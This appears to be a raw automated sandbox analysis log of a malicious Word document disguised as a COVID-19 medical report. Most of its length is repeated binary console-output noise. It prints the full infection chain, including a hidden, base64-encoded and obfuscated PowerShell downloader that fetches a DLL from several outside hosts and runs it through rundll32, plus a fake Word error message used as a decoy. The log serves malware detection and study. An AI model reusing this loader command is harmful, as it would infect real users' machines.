                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0 ................v.............}..v..... ......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x'......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0(................v.............}..v.....(......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x/......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....00................v.............}..v.....0......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x7......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....08................v.............}..v.....8......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x?......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0@................v.............}..v.....@......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....xG......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0H................v.............}..v.....H......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............v..j....`Fm...............v.............}..v....xO......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....0P................v.............}..v.....P......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............v..j....`Fm...............v.............}..v....xW......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....0X................v.............}..v.....X......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............v..j....`Fm...............v.............}..v....x_......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....0`................v.............}..v.....`......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............v..j....`Fm...............v.............}..v....xg......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....0h................v.............}..v.....h......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............v..j....`Fm...............v.............}..v....xo......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j....0p................v.............}..v.....p......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............v..j....`Fm...............v.............}..v....xw......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j....0x................v.............}..v.....x......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v............0.......................j.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................v.............}..v....(.......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j....`Fm...............v.............}..v....X.......0.......................r.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................v.............}..v............0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......v..j....`Fm...............v.............}..v.... .......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................v.............}..v....X.......0................Cm.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................h.j....E.................v.............}..v............0...............x.m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................h.j......Q...............v.............}..v....8.......0...............x.m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: IU-8549 Medical report COVID-19.docVirustotal: Detection: 63%
                      Source: IU-8549 Medical report COVID-19.docMetadefender: Detection: 56%
                      Source: IU-8549 Medical report COVID-19.docReversingLabs: Detection: 82%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
